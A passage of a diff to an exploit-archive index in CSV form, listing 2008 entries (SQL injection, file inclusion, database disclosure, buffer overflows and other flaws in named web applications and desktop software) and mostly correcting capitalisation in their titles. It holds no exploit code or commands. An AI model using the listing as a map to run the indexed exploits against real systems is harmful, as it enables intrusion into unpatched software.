8.5 - Remote Database Disclosure",2008-11-29,"CWH Underground",asp,webapps,0 7293,platforms/asp/webapps/7293.txt,"Active Web Helpdesk 2 - (Authentication Bypass) SQL Injection",2008-11-29,Cyber-Zone,asp,webapps,0 7294,platforms/php/webapps/7294.pl,"Lito Lite CMS - 'cate.php cid' SQL Injection",2008-11-29,"CWH Underground",php,webapps,0 7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 - (QuizID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7296,platforms/windows/dos/7296.txt,"Itunes 8.0.2.20/Quicktime 7.5.5 - (.mov) Multiple Off By Overflow (PoC)",2008-11-30,"laurent gaffié ",windows,dos,0 -7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - (.rdp) Buffer Overflow (PoC)",2008-11-30,"Encrypt3d.M!nd ",windows,dos,0 -7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - (CategoryID) Blind SQL Injection",2008-11-30,Cyber-Zone,php,webapps,0 +7296,platforms/windows/dos/7296.txt,"iTunes 8.0.2.20/QuickTime 7.5.5 - (.mov) Multiple Off By Overflow (PoC)",2008-11-30,"laurent gaffié ",windows,dos,0 +7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)",2008-11-30,"Encrypt3d.M!nd ",windows,dos,0 +7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - 'categoryId' Blind SQL Injection",2008-11-30,Cyber-Zone,php,webapps,0 7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 - (Authentication Bypass) SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 7301,platforms/php/webapps/7301.txt,"Active Time Billing 3.2 - (Authentication Bypass) SQL Injection",2008-11-30,AlpHaNiX,php,webapps,0 7302,platforms/php/webapps/7302.txt,"Active Business Directory 2 - Blind SQL Injection",2008-11-30,AlpHaNiX,php,webapps,0 @@ -6852,12 +6853,12 @@ id,file,description,date,author,platform,type,port 7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",php,webapps,0 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0 7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - (SQL Injection / File Upload / Authentication Bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0 -7307,platforms/windows/dos/7307.txt,"Electronics Workbench - (.EWB) Local Stack Overflow (PoC)",2008-11-30,Zigma,windows,dos,0 -7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 - (URL Rewrite) Input Variable overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 +7307,platforms/windows/dos/7307.txt,"Electronics Workbench - '.ewb' Local Stack Overflow (PoC)",2008-11-30,Zigma,windows,dos,0 +7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion",2008-11-30,NoGe,php,webapps,0 7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) SQL Injection",2008-12-01,JIKO,php,webapps,0 -7312,platforms/php/webapps/7312.txt,"Andy's PHP Knowledgebase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0 +7312,platforms/php/webapps/7312.txt,"Andy's PHP KnowledgeBase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0 7313,platforms/linux/local/7313.sh,"Debian GNU/Linux - (symlink attack in login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0 7314,platforms/windows/dos/7314.txt,"Maxum Rumpus 6.0 - Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos,0 7315,platforms/php/webapps/7315.txt,"E.Z. Poll 2 - (Authentication Bypass) SQL Injection",2008-12-01,t0fx,php,webapps,0 @@ -6865,7 +6866,7 @@ id,file,description,date,author,platform,type,port 7317,platforms/php/webapps/7317.pl,"bcoos 1.0.13 - (viewcat.php cid) SQL Injection",2008-12-01,"CWH Underground",php,webapps,0 7318,platforms/php/webapps/7318.txt,"PacPoll 4.0 - (poll.mdb/poll97.mdb) Database Disclosure",2008-12-01,AlpHaNiX,php,webapps,0 7319,platforms/php/webapps/7319.txt,"Ocean12 Mailing List Manager Gold - File Disclosure / SQL Injection / Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0 -7322,platforms/php/webapps/7322.pl,"CMS MAXSITE Component GuestBook - Remote Command Execution Exploit",2008-12-02,"CWH Underground",php,webapps,0 +7322,platforms/php/webapps/7322.pl,"CMS MAXSITE Component Guestbook - Remote Command Execution Exploit",2008-12-02,"CWH Underground",php,webapps,0 7323,platforms/php/webapps/7323.txt,"SunByte e-Flower - 'id' SQL Injection",2008-12-02,w4rl0ck,php,webapps,0 7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 - (cldb.mdb) Database Disclosure",2008-12-02,CoBRa_21,php,webapps,0 7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro (MailingList.mdb) - Database Disclosure",2008-12-02,AlpHaNiX,asp,webapps,0 @@ -6886,7 +6887,7 @@ id,file,description,date,author,platform,type,port 7340,platforms/asp/webapps/7340.txt,"Easy News Content Management - 'News.mdb' Database Disclosure",2008-12-04,BeyazKurt,asp,webapps,0 7341,platforms/php/webapps/7341.txt,"lcxbbportal 0.1 alpha 2 - Remote File Inclusion",2008-12-04,NoGe,php,webapps,0 7342,platforms/php/webapps/7342.txt,"My Simple Forum 3.0 - (index.php action) Local File Inclusion",2008-12-04,cOndemned,php,webapps,0 -7343,platforms/php/webapps/7343.txt,"Joomla Component mydyngallery 1.4.2 - (directory) SQL Injection",2008-12-04,"Khashayar Fereidani",php,webapps,0 +7343,platforms/php/webapps/7343.txt,"Joomla Component mydyngallery 1.4.2 - (Directory) SQL Injection",2008-12-04,"Khashayar Fereidani",php,webapps,0 7344,platforms/php/webapps/7344.txt,"Gravity GTD 0.4.5 - (rpc.php objectname) Local File Inclusion / Remote Code Execution",2008-12-04,dun,php,webapps,0 7345,platforms/php/webapps/7345.txt,"BNCwi 1.04 - Local File Inclusion",2008-12-04,dun,php,webapps,0 7346,platforms/php/webapps/7346.txt,"Multiple Membership Script 2.5 - 'id' SQL Injection",2008-12-05,ViRuS_HaCkErS,php,webapps,0 @@ -6898,8 +6899,8 @@ id,file,description,date,author,platform,type,port 7352,platforms/php/webapps/7352.txt,"Merlix Teamworx Server - (File Disclosure/Bypass) Multiple Remote Vulnerabilities",2008-12-05,ZoRLu,php,webapps,0 7353,platforms/asp/webapps/7353.txt,"Cold BBS - 'cforum.mdb' Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps,0 7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator .v.3 - Insecure Upload",2008-12-05,ahmadbady,php,webapps,0 -7355,platforms/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 - SITE Parameters Command Injection",2008-12-05,"Tan Chew Keong",windows,remote,0 -7356,platforms/asp/webapps/7356.txt,"asp autodealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 +7355,platforms/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 - Site Parameters Command Injection",2008-12-05,"Tan Chew Keong",windows,remote,0 +7356,platforms/asp/webapps/7356.txt,"asp AutoDealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 7357,platforms/asp/webapps/7357.txt,"ASP PORTAL - Multiple SQL Injections",2008-12-05,AlpHaNiX,asp,webapps,0 7358,platforms/windows/dos/7358.html,"Visagesoft eXPert PDF EditorX - 'VSPDFEditorX.ocx' Insecure Method",2008-12-05,"Marco Torti",windows,dos,0 7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - (news.mdb) Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0 @@ -6912,17 +6913,17 @@ id,file,description,date,author,platform,type,port 7366,platforms/php/webapps/7366.php,"Bonza Cart 1.10 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7367,platforms/php/webapps/7367.php,"PayPal eStore - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b - (forum_topic_id) SQL Injection",2008-12-07,b3hz4d,php,webapps,0 -7369,platforms/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload / Local File Inclusion Exploit",2008-12-07,DNX,php,webapps,0 -7370,platforms/asp/webapps/7370.txt,"NatterChat 1.12 - (natterchat112.mdb) Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0 +7369,platforms/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload / Local File Inclusion",2008-12-07,DNX,php,webapps,0 +7370,platforms/asp/webapps/7370.txt,"Natterchat 1.12 - (Natterchat112.mdb) Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0 7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 -7372,platforms/asp/webapps/7372.txt,"Ikon AdManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 +7372,platforms/asp/webapps/7372.txt,"Ikon ADManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7373,platforms/asp/webapps/7373.txt,"aspmanage banners - (Arbitrary File Upload / File Disclosure) Multiple Vulnerabilities",2008-12-07,ZoRLu,asp,webapps,0 7374,platforms/php/webapps/7374.txt,"Mini Blog 1.0.1 - 'index.php' Multiple Local File Inclusion",2008-12-07,cOndemned,php,webapps,0 7375,platforms/php/webapps/7375.txt,"Mini-CMS 1.0.1 - 'index.php' Multiple Local File Inclusion",2008-12-07,cOndemned,php,webapps,0 7376,platforms/asp/webapps/7376.txt,"QMail Mailing List Manager 1.2 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7377,platforms/php/webapps/7377.txt,"PHPmyGallery Gold 1.51 - 'index.php' Directory Traversal",2008-12-07,zAx,php,webapps,0 7378,platforms/asp/webapps/7378.txt,"asp talk - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-07,Bl@ckbe@rD,asp,webapps,0 -7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 - (filename) Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps,0 +7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 - 'Filename' Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps,0 7380,platforms/php/webapps/7380.txt,"XOOPS 2.3.1 - Multiple Local File Inclusion",2008-12-08,DSecRG,php,webapps,0 7381,platforms/php/webapps/7381.txt,"siu guarani - Multiple Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps,0 7382,platforms/php/webapps/7382.txt,"phpMyAdmin 3.1.0 - (Cross-Site Request Forgery) SQL Injection",2008-12-08,"Michael Brooks",php,webapps,0 @@ -6936,7 +6937,7 @@ id,file,description,date,author,platform,type,port 7390,platforms/asp/webapps/7390.txt,"Professional Download Assistant 0.1 - (Authentication Bypass) SQL Injection",2008-12-09,ZoRLu,asp,webapps,0 7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 - (Authentication Bypass) SQL Injection",2008-12-09,AlpHaNiX,asp,webapps,0 7392,platforms/php/webapps/7392.txt,"phpmygallery 1.0beta2 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities",2008-12-09,ZoRLu,php,webapps,0 -7393,platforms/linux/local/7393.txt,"PHP - safe_mode bypass via proc_open() and custom environment",2008-12-09,gat3way,linux,local,0 +7393,platforms/linux/local/7393.txt,"PHP - Safe_mode Bypass via proc_open() and custom Environment",2008-12-09,gat3way,linux,local,0 7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 - (index.php rubid) SQL Injection",2008-12-09,SuB-ZeRo,php,webapps,0 7396,platforms/php/webapps/7396.txt,"Netref 4.0 - Multiple SQL Injections",2008-12-09,SuB-ZeRo,php,webapps,0 7397,platforms/php/webapps/7397.txt,"ProQuiz 1.0 - (Authentication Bypass) SQL Injection",2008-12-09,Osirys,php,webapps,0 @@ -6949,22 +6950,22 @@ id,file,description,date,author,platform,type,port 7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 - (htmpl_admin.cgi help) Command Execution",2008-12-10,ZeN,cgi,webapps,0 7405,platforms/linux/dos/7405.c,"Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service",2008-12-10,"Jon Oberheide",linux,dos,0 7406,platforms/php/webapps/7406.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation",2008-12-10,s4avrd0w,php,webapps,0 -7407,platforms/php/webapps/7407.txt,"Webmaster Marketplace - 'member.php u' SQL Injection",2008-12-10,"Hussin X",php,webapps,0 +7407,platforms/php/webapps/7407.txt,"WebMaster Marketplace - 'member.php u' SQL Injection",2008-12-10,"Hussin X",php,webapps,0 7408,platforms/php/webapps/7408.txt,"living Local 1.1 - (Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0 7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0 7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow (Windows Vista)",2008-12-10,muts,windows,remote,0 -7411,platforms/php/webapps/7411.txt,"Butterfly Organizer 2.0.1 - (view.php id) SQL Injection",2008-12-10,Osirys,php,webapps,0 +7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - (view.php id) SQL Injection",2008-12-10,Osirys,php,webapps,0 7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0 7413,platforms/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7414,platforms/asp/webapps/7414.txt,"CF_Auction - (forummessage) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'index.cfm categorynbr' Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7416,platforms/asp/webapps/7416.txt,"CF_Forum - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - (editform) Local File Inclusion",2008-12-10,nuclear,php,webapps,0 -7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - (Cookie) Login Bypass",2008-12-11,x0r,php,webapps,0 +7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Login Bypass",2008-12-11,x0r,php,webapps,0 7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0 7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - 'mycal.mdb' Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0 -7421,platforms/php/webapps/7421.txt,"eZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution Exploit (Admin req)",2008-12-11,s4avrd0w,php,webapps,0 -7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b - (lang) Local File Inclusion",2008-12-11,x0r,php,webapps,0 +7421,platforms/php/webapps/7421.txt,"eZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution Exploit (Admin Required)",2008-12-11,s4avrd0w,php,webapps,0 +7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b - 'lang' Local File Inclusion",2008-12-11,x0r,php,webapps,0 7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 7424,platforms/asp/webapps/7424.txt,"Ad Management Java - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 7425,platforms/asp/webapps/7425.txt,"Banner Exchange Java - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 @@ -6998,12 +6999,12 @@ id,file,description,date,author,platform,type,port 7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - (redir.php id) SQL Injection",2008-12-14,nuclear,php,webapps,0 7454,platforms/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local Denial of Service",2008-12-14,Adurit-T,linux,dos,0 7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Remote",2008-12-14,x0r,php,webapps,0 -7456,platforms/php/webapps/7456.txt,"Availscript Article Script - Remote File Upload",2008-12-14,S.W.A.T.,php,webapps,0 -7457,platforms/php/webapps/7457.txt,"Availscript Classmate Script - Remote File Upload",2008-12-14,S.W.A.T.,php,webapps,0 +7456,platforms/php/webapps/7456.txt,"AvailScript Article Script - Remote File Upload",2008-12-14,S.W.A.T.,php,webapps,0 +7457,platforms/php/webapps/7457.txt,"AvailScript Classmate Script - Remote File Upload",2008-12-14,S.W.A.T.,php,webapps,0 7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - (index.php lang) Local File Inclusion",2008-12-14,Osirys,php,webapps,0 7459,platforms/php/webapps/7459.txt,"CFAGCMS 1 - Remote File Inclusion",2008-12-14,BeyazKurt,php,webapps,0 7460,platforms/windows/dos/7460.html,"EvansFTP - (EvansFTP.ocx) Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,windows,dos,0 -7461,platforms/php/webapps/7461.txt,"Flatnux - html/javascript Injection Cookie Grabber Exploit",2008-12-14,gmda,php,webapps,0 +7461,platforms/php/webapps/7461.txt,"Flatnux - html/JavaScript Injection Cookie Grabber Exploit",2008-12-14,gmda,php,webapps,0 7462,platforms/asp/webapps/7462.txt,"ASPSiteWare Home Builder 1.0/2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps,0 7463,platforms/php/webapps/7463.txt,"ASPSiteWare Automotive Dealer 1.0 / 2.0 - SQL Injection",2008-12-14,AlpHaNiX,php,webapps,0 7464,platforms/asp/webapps/7464.txt,"ASPSiteWare RealtyListing 1.0 / 2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps,0 @@ -7017,7 +7018,7 @@ id,file,description,date,author,platform,type,port 7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - 'CARateMySite.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7473,platforms/php/webapps/7473.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation",2008-12-15,s4avrd0w,php,webapps,0 7474,platforms/php/webapps/7474.txt,"FLDS 1.2a - (lpro.php id) SQL Injection",2008-12-15,nuclear,php,webapps,0 -7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - (username) Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0 +7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - 'username' Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0 7476,platforms/php/webapps/7476.txt,"Mediatheka 4.2 - Blind SQL Injection",2008-12-15,StAkeR,php,webapps,0 7477,platforms/windows/remote/7477.html,"Microsoft Internet Explorer - XML Parsing Buffer Overflow (allinone)",2008-12-15,krafty,windows,remote,0 7478,platforms/php/webapps/7478.txt,"The Rat CMS Alpha 2 - (Authentication Bypass) SQL Injection",2008-12-15,x0r,php,webapps,0 @@ -7030,7 +7031,7 @@ id,file,description,date,author,platform,type,port 7485,platforms/asp/webapps/7485.txt,"clickandemail - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 7486,platforms/asp/webapps/7486.txt,"click&rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0 7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - 'download.php' SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0 -7488,platforms/asp/webapps/7488.txt,"Web Wiz GuestBook 8.21 - (WWGguestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0 +7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - (WWGGuestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0 7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - report.php (linkida) SQL Injection",2008-12-16,ka0x,php,webapps,0 7490,platforms/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection",2008-12-16,Lidloses_Auge,php,webapps,0 7491,platforms/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,asp,webapps,0 @@ -7046,7 +7047,7 @@ id,file,description,date,author,platform,type,port 7502,platforms/php/webapps/7502.txt,"r.cms 2.0 - Multiple SQL Injections",2008-12-17,Lidloses_Auge,php,webapps,0 7503,platforms/multiple/local/7503.txt,"PHP python extension safe_mode - Bypass Local",2008-12-17,"Amir Salmani",multiple,local,0 7504,platforms/php/webapps/7504.txt,"Joomla Component Tech Article 1.x - (item) SQL Injection",2008-12-17,InjEctOr5,php,webapps,0 -7505,platforms/windows/remote/7505.html,"Phoenician Casino FlashAX - ActiveX Remote Code Execution Exploit",2008-12-17,e.wiZz!,windows,remote,0 +7505,platforms/windows/remote/7505.html,"Phoenician Casino FlashAX - ActiveX Remote Code Execution",2008-12-17,e.wiZz!,windows,remote,0 7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - (index.php menuID) SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0 7507,platforms/php/webapps/7507.pl,"Lizardware CMS 0.6.0 - Blind SQL Injection",2008-12-17,StAkeR,php,webapps,0 7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - 'QuickerSite.mdb' Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0 @@ -7066,16 +7067,16 @@ id,file,description,date,author,platform,type,port 7522,platforms/php/webapps/7522.pl,"MyPBS - 'index.php seasonID' SQL Injection",2008-12-19,Piker,php,webapps,0 7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Changing Exploit",2008-12-19,G4N0K,php,webapps,0 7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool - 'download.php' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 -7525,platforms/php/webapps/7525.txt,"Extract Website - 'download.php filename' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 +7525,platforms/php/webapps/7525.txt,"Extract Website - 'download.php Filename' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - Cross-Site Scripting / Database Disclosure",2008-12-19,Osirys,php,webapps,0 7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 - (source.php p) Remote File Disclosure",2008-12-19,Piker,php,webapps,0 7528,platforms/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Arbitrary File Upload",2008-12-19,Ams,php,webapps,0 -7529,platforms/php/webapps/7529.txt,"constructr CMS 3.02.5 stable - Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps,0 +7529,platforms/php/webapps/7529.txt,"Constructr CMS 3.02.5 stable - Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps,0 7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 - (y) Blind SQL Injection",2008-12-21,katharsis,php,webapps,0 7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone - Arbitrary File Upload",2008-12-21,S.W.A.T.,php,webapps,0 7532,platforms/php/webapps/7532.txt,"chicomas 2.0.4 - (Database Backup/File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-21,BugReport.IR,php,webapps,0 7533,platforms/windows/local/7533.txt,"PowerStrip 3.84 - (pstrip.sys) Privilege Escalation",2008-12-21,"NT Internals",windows,local,0 -7534,platforms/asp/webapps/7534.txt,"Emefa GuestBook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0 +7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0 7535,platforms/hardware/dos/7535.php,"Linksys Wireless ADSL Router (WAG54G v2) - httpd Denial of Service",2008-12-21,r0ut3r,hardware,dos,0 7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,windows,local,0 7537,platforms/php/webapps/7537.txt,"BLOG 1.55B - (image_upload.php) Arbitrary File Upload",2008-12-21,Piker,php,webapps,0 @@ -7083,18 +7084,18 @@ id,file,description,date,author,platform,type,port 7539,platforms/php/webapps/7539.txt,"Joomla Component com_tophotelmodule 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0 7540,platforms/php/webapps/7540.txt,"phpg 1.6 - (Cross-Site Scripting / Full Path Disclosure/Denial of Service) Multiple Vulnerabilities",2008-12-21,"Anarchy Angel",php,webapps,0 7541,platforms/php/webapps/7541.pl,"RSS Simple News - 'news.php pid' SQL Injection",2008-12-22,Piker,php,webapps,0 -7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - (filename) File Disclosure",2008-12-22,SirGod,php,webapps,0 -7543,platforms/php/webapps/7543.txt,"Wordpress Plugin Page Flip Image Gallery 0.2.2 - Remote FD",2008-12-22,GoLd_M,php,webapps,0 +7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - 'Filename' File Disclosure",2008-12-22,SirGod,php,webapps,0 +7543,platforms/php/webapps/7543.txt,"WordPress Plugin Page Flip Image Gallery 0.2.2 - Remote File Disclosure",2008-12-22,GoLd_M,php,webapps,0 7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b - (check_url.php url) Arbitrary File Upload / SQL Injection",2008-12-22,Ams,php,webapps,0 -7545,platforms/php/webapps/7545.txt,"yourplace 1.0.2 - Multiple Vulnerabilities / Remote Code Execution Exploit",2008-12-22,Osirys,php,webapps,0 +7545,platforms/php/webapps/7545.txt,"yourplace 1.0.2 - Multiple Vulnerabilities / Remote Code Execution",2008-12-22,Osirys,php,webapps,0 7546,platforms/php/webapps/7546.txt,"Joomla Component Volunteer 2.0 - (job_id) SQL Injection",2008-12-22,boom3rang,php,webapps,0 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (.Skin) Local Buffer Overflow (Python)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0 7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - (Forum) Remote Cookies Disclosure Exploit",2008-12-22,StAkeR,php,webapps,0 -7549,platforms/php/webapps/7549.txt,"RoundCube Webmail 0.2-3 Beta - Code Execution",2008-12-22,"Jacobo Avariento",php,webapps,0 +7549,platforms/php/webapps/7549.txt,"Roundcube Webmail 0.2-3 Beta - Code Execution",2008-12-22,"Jacobo Avariento",php,webapps,0 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0 7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - (Authentication Bypass) SQL Injection",2008-12-22,StAkeR,php,webapps,0 7552,platforms/php/webapps/7552.txt,"REDPEACH CMS - (zv) SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0 -7553,platforms/php/webapps/7553.sh,"RoundCube Webmail 0.2b - Remote Code Execution Exploit",2008-12-22,Hunger,php,webapps,0 +7553,platforms/php/webapps/7553.sh,"Roundcube Webmail 0.2b - Remote Code Execution",2008-12-22,Hunger,php,webapps,0 7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 - location.hash Remote Crash Exploit",2008-12-23,"Jeremy Brown",windows,dos,0 7555,platforms/multiple/dos/7555.py,"Psi Jabber Client (Windows / Linux) - (8010/tcp) Remote Denial of Service",2008-12-23,Sha0,multiple,dos,0 7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 - (PGPwded.sys) Local Denial of Service",2008-12-23,Evilcry,windows,dos,0 @@ -7104,7 +7105,7 @@ id,file,description,date,author,platform,type,port 7560,platforms/php/webapps/7560.txt,"cms netcat 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0 7561,platforms/php/webapps/7561.txt,"phpGreetCards - Cross-Site Scripting / Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 7562,platforms/php/webapps/7562.txt,"PHPAdBoard - (PHP uploads) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 -7563,platforms/php/webapps/7563.txt,"PHPEmployment - (PHP upload) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 +7563,platforms/php/webapps/7563.txt,"phpEmployment - (PHP upload) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 7564,platforms/multiple/dos/7564.pl,"Getleft 1.2 - Remote Buffer Overflow (PoC)",2008-12-23,Koshi,multiple,dos,0 7565,platforms/php/webapps/7565.txt,"StormBoard 1.0.1 - (thread.php id) SQL Injection",2008-12-23,Samir-M,php,webapps,0 